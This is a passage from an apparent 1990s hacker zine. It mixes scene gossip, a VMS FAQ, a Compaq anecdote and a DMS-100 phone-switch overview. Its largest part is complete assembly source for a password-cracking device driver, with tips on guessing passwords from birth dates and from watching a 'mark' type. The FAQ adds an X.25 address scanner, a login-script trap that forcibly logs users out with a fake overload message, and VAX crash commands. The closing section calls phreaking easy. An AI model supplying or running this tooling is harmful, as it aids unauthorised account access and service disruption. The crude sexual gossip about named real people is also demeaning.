  2393. Periods of Heavy        Periods of Heavy
  2394. Drug Usage              Drug Usage
  2395.  
  2396. Involved in Sex         Involved in Sex
  2397. Scandal with            Scandal with
  2398. another man             another man
  2399.  
  2400. Last name is            Friends with Phiber
  2401. "Bonaduce"              Optik whose first
  2402.                         handle was "Il Duce"
  2403.  
  2404. Supplements incoming    Supplements incoming
  2405. by doing desperate      by doing desperate
  2406. local talk shows        local talk shows
  2407. whenever he can.        whenever he can.
  2408.  
  2409. ------------------------------------------------------------------------------
  2410.  
  2411. Top 10 #hack fights that would be the coolest to see.
  2412. (And no, Ophie's not in it twice just because she's a girl...)
  2413. ===========================================================================
  2414.  
  2415. 10.) The D.C. Convention Center is Proud to Present: Hot-Oil Wrestling
  2416. featuring KL & TK.
  2417.  
  2418. 9.) Ludichrist vs. GFM, to be resolved at the next convention, or, uh, the
  2419. one after that... or, uh...
  2420.  
  2421. 8.) C-Curve and Elite Entity, "Who's who?"
  2422.  
  2423. 7.) Ben Camp vs. Ben Sherman, "Particles of Novocain Everywhere."
  2424. (Or: "I'm totally numb, let me hug you!!!")
  2425.  
  2426. 6.) Dan Farmer and Pete Shipley: "Whips vs. Chains"
  2427.  
  2428. 5.) Grayarea vs. Netcom "No, *I* want root..."
  2429.  
  2430. 4.) WWF Wrestling with Len and |al|.
  2431.  
  2432. 3.) Ophie vs. Voyager, "Night of the Living Dead."
  2433.  
  2434. 2.) Okinawa vs. Gail Thackery, "The Winner Gets Okinawa's Testicle."
  2435. and the number one #hack fight is
  2436.  
  2437. 1.) Ophie vs. all the #hack guys, "10 Bucks on the Girl"
  2438.  
  2439.  
  2440. ------------------------------------------------------------------------------
  2441.  
  2442. P A S S W O R D   E N G I N E  (for IBM PC's)                by Uncle Armpit
  2443. +++++++++++++++++++++++++++++++++++++++++++++
  2444.  
  2445.    The device driver code listed below provides a data stream of passwords.
  2446. The device driver approach was used to speed up the process
  2447. of cracking passwords on an incremental basis. The usual approach was
  2448. to generate the passwords to a file, then reading the file, etc..the device
  2449. driver approach circumvents these file storage problems, and others, such as
  2450. having enough free disk space and delays from disk i/o.
  2451.     This driver operates completely in memory (approx. 0.5Kb)
  2452.  
  2453. How practical is this?
  2454. ----------------------
  2455. This program would be very useful if you think you may know what strategy
  2456. the user/admin uses for picking out their passwords.  Without eliciting some
  2457. sort of a strategy, forget it-- unless your desperate enough!!
  2458.  
  2459.  
  2460. A "strategy" could consist of any of these possible advantages--
  2461.  
  2462. 1) default passwords (ie: SIN, student #, birth date, phone number...)
  2463. 2) the mutation of a lUSERs' known password from another system
  2464. 3) viewing the mark typing in most of their password with a couple
  2465.    of unseen characters
  2466. 4) etc...
  2467.  
  2468. ---------------------------
  2469.   With the sample device driver provided, passwords starting at
  2470. 'aaaaaaa' and ending with 'zzzzzzz' will be generated.  The length
  2471. of the password string can be modified by changing the length of
  2472. the password string itself (that is, the variable "number").  The
  2473. range of characters in the passwords can also be changed by
  2474. modifying the following two lines:
  2475.  
  2476. ;hackdrv.sys
  2477. ;.
  2478. ;.
  2479. ;
  2480. for ending character--
  2481. cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range
  2482.  
  2483. ...and for starting character
  2484. cmp byte ptr [number+si],'a'   ;starting char. in range
  2485. ;
  2486. ;----------------------
  2487.  
  2488. for instance, if you wished to generate numbers from "0000000" to
  2489. "9999999"
  2490.  
  2491. -change the ending character to:
  2492. cmp byte ptr [number+si],'9'+1
  2493.  
  2494. -starting character to:
  2495. cmp byte ptr [number+si],'0'
  2496.  
  2497. and "number" variable from 'aaaaaa' to '0000000' and then
  2498. recompile..
  2499.  
  2500. -----
  2501.  
  2502.  ..or in the third case, if u had observed a lUSER type in most of
  2503. their password, you may want to rewrite the code to limit the
  2504. search.  IE: limit the keys to a certain quadrant of the keyboard.
  2505.    Modify the code starting at "reiterate:"  and ending at "inc_num
  2506. endp" for this.
  2507. =================================================================
  2508.  
  2509.  
  2510. /'nuff of this!/   How do I get things working?
  2511. -----------------------------------------------
  2512.  
  2513. Compile the device driver "hackdrv.sys", and the second program,
  2514. "modpwd.asm". Then specify the device driver inside config.sys
  2515. (ie: "c:\hackdrv.sys").  The code below was compiled with the a86
  2516. compiler, v3.03.  Some modifications might be needed to work with
  2517. other compilers.
  2518.  
  2519. To use it in prgs like crackerjack, type in the following on the
  2520. command line:
  2521.  
  2522.  
  2523. c:\>jack -pwfile:<your password file here!> -word:hackpwd
  2524.  
  2525. ------
  2526.  If you had stopped a cracker program (eg: crackerjack) and want to
  2527. pick up from where you left off, run the program "modpwd.com".
  2528.  
  2529.  This program can change HACKDRVs password through-
  2530.  
  2531.  a) a command line argument (ie: "modpwd aabbbbe")
  2532.  b) executing the program with no parameters (this method also
  2533.     displays the current password in memory)
  2534.  
  2535.  
  2536.  
  2537.                                                    Happy Hacking,
  2538.                                                    Uncle Armpit
  2539.  
  2540. ;-----------------------cut here--------------------------------
  2541. ;Program HACKDRV.SYS
  2542. ;
  2543. org 0h
  2544. next_dev dd -1
  2545. attribute dw 0c000h            ;character device w/ ioctl calls
  2546. strategy dw dev_strategy
  2547. interrupt dw dev_int
  2548. dev_name db 'HACKPWD '
  2549. countr dw offset number
  2550. number db 'aaaaaa',0ah         ;<----six characters, lower case
  2551. numsize equ $-number - 2
  2552. afternum:
  2553.  
  2554. ;working space for device driver
  2555. rh_ofs dw ?
  2556. rh_seg dw ?
  2557.  
  2558. dev_strategy:               ;strategy routine
  2559. mov cs:rh_seg,es
  2560. mov cs:rh_ofs,bx
  2561. retf
  2562.  
  2563. dev_int:                    ;interrupt routine
  2564. pushf
  2565. push ds
  2566. push es
  2567. push ax
  2568. push bx
  2569. push cx
  2570. push dx
  2571. push di
  2572. push si
  2573.  
  2574. cld
  2575. push cs
  2576. pop ds
  2577.  
  2578. mov bx,cs:rh_seg
  2579. mov es,bx
  2580. mov bx,cs:rh_ofs
  2581.  
  2582. mov al,es:[bx]+2
  2583. rol al,1
  2584. mov di,offset cmdtab
  2585. xor ah,ah
  2586. add di,ax
  2587. jmp word ptr[di]
  2588.  
  2589.  
  2590. cmdtab:            ;command table
  2591. dw init        ;0
  2592. dw exit3       ;1
  2593. dw exit3       ;2
  2594. dw ioctl_read  ;3
  2595. dw do_read     ;4
  2596. dw exit3       ;5
  2597. dw exit3       ;6
  2598. dw exit3       ;7
  2599. dw exit3       ;8
  2600. dw exit3       ;9
  2601. dw exit3       ;10
  2602. dw exit3       ;11
  2603. dw ioctl_write ;12
  2604. dw exit3       ;13
  2605. dw 5 dup (offset exit3)
  2606.  
  2607.  
  2608.  
  2609. ioctl_read:
  2610. push es
  2611. push bx
  2612.  
  2613. mov si,es:[bx+10h]
  2614. mov di,es:[bx+0eh]
  2615. mov es,si
  2616.  
  2617. push cs
  2618. pop ds
  2619. mov si,offset number
  2620. xor cx,cx
  2621.  
  2622. get_char:
  2623. lodsb
  2624. stosb
  2625. inc cl
  2626. cmp al,0ah
  2627. jz ioctl_rend
  2628. jmp get_char
  2629.  
  2630. ioctl_rend:
  2631. pop bx
  2632. pop es
  2633. mov es:[bx+012h],cx
  2634. mov cs:countr,offset number
  2635. jmp exit2
  2636.  
  2637. ioctl_write:
  2638. push es
  2639. push bx
  2640. mov si,es:[bx+010h]
  2641. mov ds,si
  2642. mov si,es:[bx+0eh]
  2643. mov cx,numsize+1               ;es:[bx+012h]
  2644. push cs
  2645. pop es
  2646. mov di,offset number
  2647. repe movsb
  2648. pop es
  2649. pop bx
  2650. mov cs:countr,offset number
  2651. jmp exit2
  2652.  
  2653.  
  2654. do_read:
  2655. push es
  2656. push bx
  2657.  
  2658.  
  2659. push cs
  2660. pop ds
  2661.  
  2662. mov si,[countr]
  2663. inc si                      ;word ptr [countr]
  2664. cmp si,offset afternum
  2665. jnz is_okay
  2666. mov si,offset number
  2667. call inc_num
  2668.  
  2669.  
  2670. is_okay:
  2671. mov [countr],si
  2672. mov di,es:[bx]+0eh
  2673. mov ax,es:[bx]+010h
  2674. mov cx, es:[bx]+012h
  2675. jcxz clean_up
  2676. mov es,ax
  2677. repe movsb
  2678.  
  2679. clean_up:
  2680. pop bx
  2681. pop es
  2682. jmp exit2
  2683.  
  2684.  
  2685. exit3: mov es:word ptr 3[bx],08103h
  2686. jmp exit1
  2687.  
  2688. exit2:
  2689. mov es:word ptr 3[bx],0100h
  2690.  
  2691. exit1:
  2692. pop si
  2693. pop di
  2694. pop dx
  2695. pop cx
  2696. pop bx
  2697. pop ax
  2698. pop es
  2699. pop ds
  2700. popf
  2701. retf
  2702. exit:
  2703.  
  2704. inc_num proc near
  2705.  push si
  2706.  mov si,numsize
  2707.  
  2708.  reiterate:
  2709.   inc byte ptr [number+si]
  2710.   cmp byte ptr [number+si],'z'+1    ;+1 past ending char. in range
  2711.   jnz _exit
  2712.   mov byte ptr [number+si],'a'      ;starting char. in range
  2713.   dec si
  2714.   cmp si,-1
  2715.   jnz reiterate
  2716.   mov byte ptr [number],01ah        ;send EOF
  2717.  _exit:
  2718.   pop si
  2719.   ret
  2720. inc_num endp
  2721.  
  2722.  
  2723.  
  2724. at_eof:                        ; the non-resident code starts here
  2725.  
  2726. initial proc near
  2727. push es
  2728.  
  2729. push cs
  2730. pop ds
  2731.  
  2732. push cs
  2733. pop es
  2734.  
  2735. mov si,offset number
  2736. mov di,offset tmpnum
  2737. cld
  2738. _again:
  2739. lodsb
  2740. cmp al,0ah
  2741. jz _nomorechars
  2742. stosb
  2743. jmp _again
  2744.  
  2745. _nomorechars:
  2746. mov si,offset msgend
  2747. mov cx,4
  2748. repe movsb
  2749.  
  2750. mov ah,09             ;print welcome message
  2751. mov dx,offset msg1
  2752. int 21h
  2753.  
  2754. pop es
  2755. ret
  2756. initial endp
  2757.  
  2758. init: call initial
  2759. mov ax,offset at_eof
  2760. mov es:[bx]+0eh,ax
  2761. push cs
  2762. pop ax
  2763. mov es:[bx]+010h,ax
  2764. mov cs:word ptr cmdtab,offset exit3
  2765. jmp exit2
  2766.  
  2767.  
  2768. msg1    db "Incremental Password Generator (c)1995",0ah,0dh
  2769.         db "Written by Uncle Armpit",0ah,0dh,0ah,0dh
  2770.         db "Starting at word ["
  2771. tmpnum  db 10 dup (?)
  2772. msgend  db "]",0a,0d,'$'
  2773. ;END hackdrv.sys
  2774.  
  2775. ;------------------------------cut here----------------------------------
  2776.  
  2777. ;PROGRAM modpwd.asm
  2778. ;
  2779. org 0100h
  2780. mov ax,03d02h
  2781. xor cx,cx
  2782. mov dx,offset devname
  2783. int 21h
  2784. jnc drvr_found
  2785.  
  2786. mov ah,09
  2787. mov dx,offset no_drvr
  2788. int 21h
  2789. jmp error_pass
  2790.  
  2791.  
  2792. drvr_found:
  2793. mov bx,ax
  2794. mov ax,04402h
  2795. mov cx,20                   ;read 20 characters
  2796. mov dx,offset databuffr
  2797. int 21h
  2798.  
  2799. mov pass_len,al
  2800. dec al
  2801. mov ah,al
  2802. and al,0fh
  2803. mov cl,4
  2804. shr ah,cl
  2805. add ax,03030h
  2806. cmp al,'9'
  2807. jbe inrange
  2808. add al,7
  2809. inrange:
  2810. cmp ah,'9'
  2811. jbe inrange1
  2812. add ah,7
  2813. inrange1:
  2814. mov byte ptr [num_chr],ah
  2815. mov byte ptr [num_chr+1],al
  2816.  
  2817.  
  2818. cld
  2819. mov di,offset databuffr-1
  2820. xor cx,cx
  2821. mov cl,pass_len
  2822. add di,cx
  2823. mov si,offset pass_end
  2824. mov cx,stringsz
  2825. repe movsb
  2826.  
  2827. ;check for information in command line
  2828. ;else--> prompt for user input
  2829. mov al,pass_len
  2830. or byte ptr [0080h],0
  2831. jz req_input
  2832. mov cl,[0080h]
  2833. dec cl
  2834. mov [0081h],cl
  2835. mov si,0081h
  2836. mov di,offset newpass
  2837. mov cx,20
  2838. repe movsb
  2839. jmp vrfy_info
  2840.  
  2841. req_input:
  2842. mov ah,09
  2843. mov dx,offset cur_pass
  2844. int 21h
  2845.  
  2846. mov ah,0a
  2847. mov dx,offset pass_len
  2848. int 21h
  2849.  
  2850.  
  2851. vrfy_info:
  2852. mov ax,word ptr [pass_len]
  2853. cmp ah,0
  2854. jz error_pass
  2855. dec al
  2856. cmp ah,al
  2857. jnz error_len
  2858.  
  2859. ;change the current password
  2860. xor cx,cx
  2861. mov cl,al
  2862. mov ah,044h
  2863. mov al,03
  2864. mov dx,offset newpass+1
  2865. int 21h
  2866. jnc success_pass
  2867.  
  2868. error_len:
  2869. mov ah,09
  2870. mov dx,offset errormsg
  2871. int 21h
  2872.  
  2873. error_pass:
  2874. mov ax,04c01h                     ;abnormal termination
  2875. int 21h
  2876.  
  2877. success_pass:
  2878. mov ax,04c00h
  2879. int 21h
  2880.  
  2881.  
  2882. devhandle  dw ?
  2883. cur_pass   db 'Current password is ['
  2884. databuffr  db 20 dup (?)
  2885. pass_end   db ']      ;'
  2886. num_chr    db '  '
  2887.            db ' characters',0ah,0dh,0ah,0dh
  2888. prompt     db 'New word: ','$'
  2889. stringsz  equ $ - pass_end
  2890.  
  2891. pass_len   db 00
  2892. newpass    db 20 dup (?)
  2893. errormsg   db 'error changing password!',0ah,0dh,'$'
  2894. no_drvr    db 'Error: '
  2895. devname    db "HACKPWD ",00
  2896.            db 'device driver not loaded!',0ah,0dh,07,'$'
  2897.  
  2898.  
  2899. ------------------------------------------------------------------------------
  2900.  
  2901.          -- Frequently & Rarely asked questions about VMS -- part one
  2902.         by Opticon the Disassembled - UPi
  2903.  
  2904. [1]
  2905.  
  2906.  " I have a kropotkin.hlp file. What could I possibly do with it ? "
  2907.  
  2908. $ library /insert /help sys$help:helplib.hlb kropotkin.hlp
  2909. .
  2910. .
  2911. .
  2912. $ help kropotkin
  2913.  
  2914. [2]
  2915.  
  2916.  " I have a bakunin.tlb file. What to do with it ? "
  2917.  
  2918. $ library /extract=(*) bakunin.tlb
  2919. .
  2920. .
  2921. .
  2922. $ dir
  2923.  
  2924. [3]
  2925.  
  2926.  " I would like to have a look at prunton.dat. "
  2927.  
  2928. $ dump [/block=(count:x)] prunton.dat
  2929.  
  2930. Where "x" is the number of blocks DUMP will display.
  2931.  
  2932. [4]
  2933.  
  2934.  " How can I use an external editor with mail ? "
  2935.  
  2936. $ mail :== mail /edit=(send,reply=extract,forward)
  2937.  
  2938. [5]
  2939.  
  2940.  " How a HELP file is organized ? "
  2941.  
  2942. $ create example.hlp
  2943. 1 EXAMPLE
  2944.  
  2945.   THIS IS AN EXAMPLE.
  2946.  
  2947. 2 MORE_EXAMPLES
  2948.  
  2949.   MORE EXAMPLES.
  2950.  
  2951. 3 EVEN_MORE_EXAMPLES
  2952.  
  2953.   EVEN MORE EXAMPLES.
  2954. <CTRL-Z>
  2955.  
  2956. [6]
  2957.  
  2958.  " How can I have a look at queues ? "
  2959.  
  2960. $ show queue smtp /all/full
  2961.  
  2962. or
  2963.  
  2964. $ show queue /batch/all/full
  2965.  
  2966. or
  2967.  
  2968. $ show queue /all/full
  2969.  
  2970. [7]
  2971.  
  2972.  " My mail is holded, for some reason, in the SMTP queue... "
  2973.  
  2974. Either
  2975.  
  2976. $ delete /entry=XXX
  2977.  
  2978. or
  2979.  
  2980. $ set entry XXX /release
  2981.  
  2982. in order to force VMS to release it right away.
  2983.  
  2984. [8]
  2985.  
  2986.  " How do I have a look at DTE and circuits available. "
  2987.  
  2988. $ mc ncp show known dte
  2989.  
  2990. and
  2991.  
  2992. $ mc ncp show known circuits
  2993.  
  2994. You may also may find of interest:
  2995.  
  2996. $ mc ncp show known networks
  2997.  
  2998. $ mc ncp show known lines
  2999.  
  3000. $ mc ncp show known destinations
  3001.  
  3002. [9]
  3003.  
  3004.  " I need a NUA scanner for VMS. "
  3005.  
  3006. $ OPEN/READ VALUES SCAN.VAL
  3007. $ READ VALUES PRE
  3008. $ READ VALUES DTE
  3009. $ READ VALUES END
  3010. $ CLOSE VALUES
  3011. $ LOG = "SCAN.LIS"
  3012. $ TMP = "SCAN.TMP"
  3013. $ OPEN/WRITE FILE 'LOG
  3014. $ WRITE FILE "PREFIX:",PRE
  3015. $ WRITE FILE "START :",DTE
  3016. $ WRITE FILE "LAST  :",END
  3017. $LOOP:
  3018. $ ON ERROR THEN GOTO OPEN
  3019. $ SPAWN/NOWAIT/OUTPUT='TMP' SET HOST/X29 'PRE''DTE'
  3020. $ WAIT 00:00:06
  3021. $ SPAWN_NAME = F$GETJPI("","USERNAME")
  3022. $ SPAWN_NAME = F$EXTRACT(0,F$LOC(" ",SPAWN_NAME),SPAWN_NAME) + "_"
  3023. $ CONTEXT = ""
  3024. $FIND_PROC:
  3025. $ PID = F$PID(CONTEXT)
  3026. $ IF PID .EQS. "" THEN GOTO OPEN
  3027. $ IF F$LOC(SPAWN_NAME,F$GETJPI(PID,"PRCNAM")) .EQ. 0 THEN STOP/ID='PID
  3028. $ GOTO FIND_PROC
  3029. $OPEN:
  3030. $ ON ERROR THEN GOTO OPEN
  3031. $ OPEN/READ PAD 'TMP
  3032. $ MSSG = " Process stopped"
  3033. $ ON ERROR THEN GOTO CLOSE
  3034. $ READ PAD LINE
  3035. $ IF F$LOC("call clear",LINE) .LT. F$LEN(LINE) THEN READ PAD LINE
  3036. $ MSSG = F$EXTRACT(F$LOC(",",LINE)+1,80,LINE)
  3037. $CLOSE:
  3038. $ CLOSE PAD
  3039. $ DELETE 'TMP';*
  3040. $ IF F$LOC("obtain",MSSG).NE.F$LENGTH(MSSG) THEN GOTO NOCONN
  3041. $ WRITE FILE PRE,DTE,MSSG
  3042. $NOCONN:
  3043. $ DTE = DTE + 1
  3044. $ IF DTE .LE. END THEN GOTO LOOP
  3045. $ CLOSE FILE
  3046.  
  3047. ( I don't have a clue by whom the code was written. )
  3048.  
  3049. then
  3050.  
  3051. $ create scan.val
  3052. prefix
  3053. starting_NUA
  3054. ending_NUA
  3055. <CTRL-Z>
  3056. $ submit /noprint scan.com
  3057. .
  3058. .
  3059. .
  3060. $ search scan.lis "call connected"
  3061.  
  3062. [10]
  3063.  
  3064.  " How do I crash a VAX !? "
  3065.  
  3066. $ set default sys$system
  3067. $ @shutdown
  3068.  
  3069. or
  3070.  
  3071. $ set default sys$system
  3072. $ run opccrash
  3073.  
  3074. [11]
  3075.  
  3076.  " I have a dostogiefski.cld file; what do I do with it ? "
  3077.  
  3078. $ set command dostogiefski.cld
  3079.  
  3080. [12]
  3081.  
  3082.  " Can I send messages to interactive processes ? "
  3083.  
  3084. $ reply [/user=username] [/bell] [/id=xxxx] " Carlos Marigella "
  3085.  
  3086. [13]
  3087.  
  3088.  " How can I prevent someone from phoning me all the time ? "
  3089.  
  3090. $ set broadcast=(nophone)
  3091.  
  3092. [14]
  3093.  
  3094.  " Can I postpone/disable interactive logins ? "
  3095.  
  3096. $ set logins /interactive=0
  3097.  
  3098. $ set logins /interactive
  3099.  
  3100. will display current value.
  3101.  
  3102. Under the same `logic' :
  3103.  
  3104. $ create innocent_filename.com
  3105. $ set nocontrol
  3106. $ context = ""
  3107. $ pid = F$PID(context)
  3108. $ user_name = F$GETJPI(pid,"username")
  3109. $ wait 00:01:00.00
  3110. $ write sys$output ""
  3111. $ write sys$output " System overloaded; please try again later "
  3112. $ write sys$output " Logging out process ''pid', of user ''user_name' "
  3113. $ write sys$output ""
  3114. $ logout /full
  3115.  
  3116. Add either to sys$system:sylogin.com or sys$login:login.com the following:
  3117. " $ @innocent_filename.com ".
  3118.  
  3119. [15]
  3120.  
  3121.  " How can I modify the welcome file ? Where is it held ? "
  3122.  
  3123. $ set default sys$system
  3124. $ edit welcome.txt
  3125.  
  3126. [16]
  3127.  
  3128.  " I am editing a huge text file. How can I reach the end of it ? "
  3129.  
  3130. at the editor's prompt type:
  3131.  
  3132. *find end
  3133.  
  3134. or
  3135.  
  3136. *find "search string"
  3137.  
  3138. [17]
  3139.  
  3140.    " How can I be sure than noone is watching me from a hidden process ? "
  3141.  
  3142. $ show system /process
  3143. VAX/VMS V5.5-2  on node STIRNER  30-MAR-1937 02:10:41.94   Uptime  2 03:05:25
  3144.   Pid    Process Name    State  Pri      I/O       CPU       Page flts Ph.Mem
  3145. .
  3146. .
  3147. .
  3148. 00000114 SYMBIONT_4      HIB      5      290   0 00:00:19.05      1650     47
  3149. 00000117 SMTP_SYMBIONT   HIB      4    33398   0 00:16:49.67    246104    426
  3150. 00000118 SYMBIONT_6      HIB      4    47868   0 00:05:09.01       296    121
  3151. 00001255 SYMBIONT_0001   CUR 13  15    64293   0 00:05:08.12      1982    248
  3152.  
  3153. $ show system /full
  3154.  
  3155. VAX/VMS V5.5-2  on node STIRNER  30-MAR-1937 02:10:59.64   Uptime  2 03:05:43
  3156.   Pid    Process Name    State  Pri      I/O       CPU       Page flts Ph.Mem
  3157. .
  3158. .
  3159. .
  3160. 00000114 SYMBIONT_4      HIB      5      290   0 00:00:19.05      1650     47
  3161.          [1,4]
  3162. 00000117 SMTP_SYMBIONT   LEF      5    33407   0 00:16:49.78    246116    502
  3163.          [1,4]
  3164. 00000118 SYMBIONT_6      HIB      5    47872   0 00:05:09.03       296    121
  3165.          [1,4]
  3166. 00001255 SYMBIONT_0001   CUR 13  15    64348   0 00:05:09.60      2063    268
  3167.          [1,4]
  3168. $
  3169.  
  3170.  See the difference between system's SYMBIONT processes ( i.e. SYMBIONT_4,
  3171.  SYMBIONT_6, SMTP_SYMBIONT ) and the one created by using a `stealth' program
  3172.  ( SYMBIONT_0001 ); the names and the User Identification Codes may vary, but
  3173.  state, priority, physical memory used, page faults, input/output and Process
  3174.  IDentification numbers, can reveal, in combination, such a nastyness.
  3175.  
  3176.  Afterwards you may " show process /id=xxxx /continuous ",
  3177.  or " stop /id=xxxx ".
  3178.  
  3179. [18]
  3180.  
  3181.    " Can I view the CPU usage of each process ? "
  3182.  
  3183. $ monitor processes /topcpu
  3184.  
  3185. will display a bar-chart of this kind.
  3186.  
  3187. [19]
  3188.  
  3189.    Run the following .COM file and it will display information you'd
  3190.  possibly need on an account and/or node. It uses simple lexical functions.
  3191.  
  3192. $ output :== write sys$output
  3193. $ output ""
  3194. $ node_id = F$CSID(context)
  3195. $ nodename = F$GETSYI("nodename",,node_id)
  3196. $ if F$GETSYI("cluster_member") .EQS. "TRUE"
  3197. $ then output " ''nodename' is a member of a cluster. "
  3198. $ else output " ''nodename' is not a member of a cluster. "
  3199. $ context = ""
  3200. $ username = F$GETJPI("","username")
  3201. $ output " Username : ''username' "
  3202. $ group = F$GETJPI("","grp")
  3203. $ output " Group : ''group' "
  3204. $ uic = F$USER()
  3205. $ output " User Identification Code : ''uic' "
  3206. $ pid = F$PID(context)
  3207. $ output " Process IDentification : ''pid' "
  3208. $ process = F$PROCESS()
  3209. $ output " Process Name : ''process' "
  3210. $ terminal = F$GETJPI("","terminal")
  3211. $ output " Terminal Name : ''terminal' "
  3212. $ priority = F$GETJPI("","authpri")
  3213. $ output " Authorized Priority : ''priority' "
  3214. $ maxjobs = F$GETJPI("","maxjobs")
  3215. $ output " Maximum Number of Processes Allowed : ''maxjobs' "
  3216. $ authpriv = F$GETJPI("","authpriv")
  3217. $ output " Authorized Privileges : ''authpriv' "
  3218. $ curpriv = F$GETJPI("","curpriv")
  3219. $ output " Current Privileges : ''curpriv' "
  3220. $ directory = F$DIRECTORY()
  3221. $ output " Directory : ''directory' "
  3222. $ protection = F$ENVIRONMENT("protection")
  3223. $ output " Protection : ''protection' "
  3224. $ boottime = F$GETSYI("boottime")
  3225. $ output " Boot Time : ''boottime' "
  3226. $ time = F$TIME()
  3227. $ output " Current Time : ''time' "
  3228. $ version = F$GETSYI("version")
  3229. $ output " VMS version : ''version' "
  3230. $ output ""
  3231.  
  3232.  You may :
  3233.  
  3234. $ library /extract=(lexicals) /output=lexicals.hlp sys$help:helplib.hlb
  3235.  
  3236. and then transfer lexicals.hlp.
  3237.  
  3238. [20]
  3239.  
  3240.     " How can I view/modify my disk quota limit ? "
  3241.  
  3242.  DiskQuota was a standalone utility in versions prior to five; It is now
  3243.  a subset of the System Management utility, and thus you should :
  3244.  
  3245. $ set def sys$system
  3246. $ run sysman
  3247. SYSMAN> diskquota show /device=dua1: [1,1]
  3248. %SYSMAN-I-QUOTA, disk quota statistics on device DUA1: --
  3249. Node
  3250.      UIC                  Usage        Permanent Quota   Overdraft Limit
  3251. [1,1]                     123456       1500000           100
  3252.  
  3253. SYSMAN> diskquota modify /device=dua1: [1,1] /permquota=654321 /overdraft=1000
  3254.  
  3255. [END]
  3256.  
  3257.    Post Scriptum
  3258.  
  3259.    Some operations require privileges.
  3260.  
  3261.  
  3262. ------------------------------------------------------------------------------
  3263.  
  3264. Compaq CEO blunders on TV
  3265.  
  3266.           Compaq CEO Eckard Pfeiffer last week visited The Netherlands
  3267.           to do some pr work. During a television interview for NOVA,
  3268.           a well known news show that aired last Friday, Pfeiffer
  3269.           claimed that pc's were easy to use, and could be used by
  3270.           virtually anyone. So, the reporter asked him to switch the
  3271.           tv channel on a Presario that was next to Pfeiffer that ran
  3272.           a Windows-based TV tuner. The result was Pfeifer frantically
  3273.           clicking on several menu bars, but instead of switching
  3274.           channels, he exited the program altogether. To make things
  3275.           worse, the reporter next asked him to start up a word
  3276.           processor.  Again, Pfeiffer, clicked his way around the
  3277.           desktop, but couldn't find nor start the program. Finally,
  3278.           he was asked to start up a game. You saw Pfeifer (now in
  3279.           deep trouble) clicking on all the tabs of the "easy to use"
  3280.           tab-works interface that is included on all Presario's,
  3281.           looking for games, while muttering "Were are ze games? I
  3282.           can't find ze games on zis machine!!!", his accent becoming
  3283.           increasingly more German then before. It was almost like Dr.
  3284.           Strangelove. The last shot is of a Compaq tech support guy,
  3285.           rushing in to help him out....  So much for ease of use....
  3286.  
  3287. Voorburgwal 129, 1012 EP
  3288. Amsterdam, The Netherlands).
  3289.  
  3290. ------------------------------------------------------------------------------
  3291.  
  3292. Ok, I'm going to assume that you already know a little bit about what it
  3293. is you're reading.  The DMS100/IBN (integrated business network) is
  3294. composed of mainly electronic business sets, phones, data units, and
  3295. attendant consoles and units, all physically at the customers place of
  3296. business.  While the digital switching software and support hardware is
  3297. located at the Telco.  Together, in tandem they work to give the customer
  3298. one of the best combinations of features and benefits.  The DMS-100
  3299. combines voice AND data in one business comunications package.  One of
  3300. the many advantages is it offers the use with *any* sized business with
  3301. up to 30,000 lines.  The IBN system controls most operations, diagnoses
  3302. problems, and also has the ability to do limited repairs on itself.
  3303. Being modular, it can meet the needs at hand, and have the ability for
  3304. new features, as time goes by, while still maintaining a cost-effective
  3305. environment.  Another advantage is that is uses a central attendant where
  3306. and when needed.  Along with Call Routing, or CDR, to control and
  3307. restrict Long Distnace Calling, and network management.  The IBN gives
  3308. the user hassle free operation.  Northern Telcom's DMS-100 switches,
  3309. which by the way are digital, are frequently backed-up by their
  3310. *higher trained* personnel, which isnt saying much.  Some other features
  3311. are: Automatic Routing Selection, or ARS, which routes the long distance
  3312. calls, if they are even allowed, over the most economical (right) route
  3313. available.  Station Message Detail Recording, or SMDR, which basically
  3314. does just what its name states, records long distance charges, including
  3315. but not limited to, originating number, time and length of call,
  3316. authorization code, and others...  Yet another capability is the Direct
  3317. Inward System Access (DISA), which gives the personnel the ability to use
  3318. the system to place long distance calls cheaply, even from outside the
  3319. company (sounds like a PBX a bit doesn't it?).
  3320. System Features and Benefits:  There are 6 Call Waiting Lamp Loop Keys,
  3321. each with its associated source AND destination lamp to signify the
  3322. status of both the calling and the called party status.  The Second
  3323. feature is Alpha Numeric Display Multiple Directory Number Feature Keys,
  3324. up to 42 of them, which can be used for a Paging System, or speed
  3325. dialing, and things along those lines.  A third feature is the release
  3326. Source/Release Destination Console, which features access to paging.
  3327. Other features which mainly are unimportant I will list here, they are:
  3328. Call Identifier Exclude Source/Exclude Destination.  Remote Console Call
  3329. Destination.  Signal Source.Signal Destination.  Call Holding.  Call
  3330. Detail Entry.  Remote Console Call Selection.  Console Display.  Camp-on
  3331. Automatic Recall Conference.  A 6 port 2 way splitting non-delayed
  3332. operation.  Busy Verification of Lines.  Manual and Automatic Hold.
  3333. Multiple Console OPeration.  Busy verification of trunks. Switched Loop
  3334. Operation.  Trunk Group Busy Indication.  Uniform Call distribution form
  3335. queue.  Multiple listed directory numbers.  Control of trunk group
  3336. access.  Secrecy.  Night Service.  Serial call.  Speed Calling.  Lockout.
  3337.  Delayed Operation.  Position Busy.  Interposition Calling.  THrough Call
  3338. Pickup.  RIng Again.  Multiple Directory Numbers.  Intercom.  Speed
  3339. Call.  Call Transfer/Conference.  On-Hook Dialing.  Additional
  3340. Programmable Features include automatic hold.  Listem-on hold.  Multiple
  3341. Appearance Directory Numbers, or MADN.  Single Call Arrangement.
  3342. Multiple Call Arrangement.  Privacy Release.  Tone Ringing with Volume
  3343. Control.  Call Waiting.  Stored Number Redial.  Private Business Line.
  3344. And Finally a 32 character alphanumeric data unit.  The DMS100/IBN can be
  3345. used as a "standalone" or can be attached to the business set or other
  3346. phone type unit.  It has the ability to transmit over a two wire loop, at
  3347. speeds of up to 56 kb per second, using a proprietary time compression
  3348. multiplexing technology.  The DMS100 is also available in different
  3349. models to suit existing terminal capacities.  It also provides integrated
  3350. voice/data, that right data, communications.  They, the phone company,
  3351. and data unit, can operate together, simultaniously, or even independant
  3352. of one another.  Being fully digitized, it was one if the first switches
  3353. to eliminate the use of those dinosaur analog modems (for which i still
  3354. have a few if anyone wants to buy em off me or give me shipping money and
  3355. ill send em to ya free).  Well thats it for now.  This should give you a
  3356. good understanding of the capabilities of one of the many switches in use
  3357. today.  In fact, although outdated somewhat, my telco, citizens
  3358. utilities, and one in stockton from what i just found out, is still using
  3359. this switch (poor me in elk grove, ca eh?)
  3360. which makes phreaking quite an easy task, not that it was really ever
  3361. hard but anything to make it easier help.  ANyway, if you have any
